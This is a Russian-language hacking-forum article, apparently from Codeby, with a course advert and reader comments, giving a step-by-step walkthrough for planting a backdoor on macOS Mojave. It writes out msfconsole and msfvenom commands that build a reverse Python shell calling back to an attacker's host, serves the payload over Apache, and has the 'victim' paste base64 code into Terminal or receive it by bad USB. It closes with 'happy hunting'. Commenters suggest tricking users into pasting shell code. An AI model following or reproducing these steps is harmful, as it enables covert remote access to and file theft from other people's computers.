• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Создание бэкдора в операционной системе Mac OS X при помощи терминала и Kali Linux

Привет. В последние время от всех друзей слышу, что Mac OS X - самая безопасная система. Но почему? Основной аргумент - у данной ОС закрытая файловая система, в то время как у Windows она открыта. Это значит, что можно просмотреть все системные файлы или отредактировать их. Злоумышленники используют ее для устойчивости вирусов, путем перемещения вируса в папку с системными файлами и дальнейшим его переименованием в файл обновления, например explorer.exe. Но сейчас я покажу как можно создать бэкдор в яблочной системе при помощи команды в терминале.

Для создания бэкдора понадобится всеми любимый Metasploit, установленный на Kali Linux. В качестве жертвы выступит macOS Mojave версии 10.14.4 на моем макбуке. А в качестве атакующей машины - Kali Linux на virtual box. Заражение компьютера будет происходить через комманд шелл, написанный на питоне. В результате удачной атаки откроется доступ к файловой системе жертвы, возможность загружать сторонние эксплоиты на компьютер или скачивать файлы с зараженной машины.

Перейдем к практике.

1) Запустим метасплоит всем известной командой
Код:
msfconsole
(примечание: если у кого то она не работает, запустите программу через графическое меню слева)

28984


2) use exploit/multi/handler

28985


3) Создаем сам exploit, указывая свой IPv4 вместо YOUR IP
Код:
msfvenom -p cmd/unix/reverse_python LHOST=YOUR IP LPORT=9090 -f rar > /root/shell.py
28986


4) Для удобства запустим сервер apache
Код:
service apache2 start
28987


5) Переместим туда shell.py
Код:
cp shell.py /var/www/html
28988


6) Настраиваем метасплоит под наш вирус и запускаем. Главное не сделать опечатку, а то все пойдет через АНБ.
Код:
set payload cmd/unix/reverse_python
set LHOST YOUR IPv4
set LPORT 9090
run
28989


7) Если у вас есть доступ к компьютеру жертвы, то откройте safari и перейдите по ссылке lhost, если же нет, то можно использовать bad usb

28990


8) Открываем файл shell.py

28991


9) Видим непонятные цифры и буквы в формате base64, копируем, вставляем в терминал и запускаем.

28992


10)И видим что у появилась одна сессия.
(примечание: после запуска сессии никаких дополнительных команд вводить не нужно, вы уже внутри.)

28994


11) Ну а что вы будете делать дальше зависит только от вашего воображения.
чтобы узнать в какой вы директории, напишите pwd
чтобы узнать какие файлы в директории, напишите ls

28995


Спасибо за внимание и удачной охоты.
 

Kura1

New member
03.08.2019
1
0
BIT
2
Можно же просто заставить вставить код шел в консоль на маке?
 

yky

Green Team
31.12.2019
100
41
BIT
1
Это насколько нужно быть идиотом что бы запустить неизвестный скрипт на маке?
Да и не прокатит сейчас это на 10.15
 
  • Нравится
Реакции: rmsrms rmsrmsrms

sergvolk

Green Team
20.10.2016
82
2
BIT
0
Вариант с BadUsb поинтереснее будет. Скачать скрипт, открыть терминал, вставить код, запустить - слишком все сложно.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!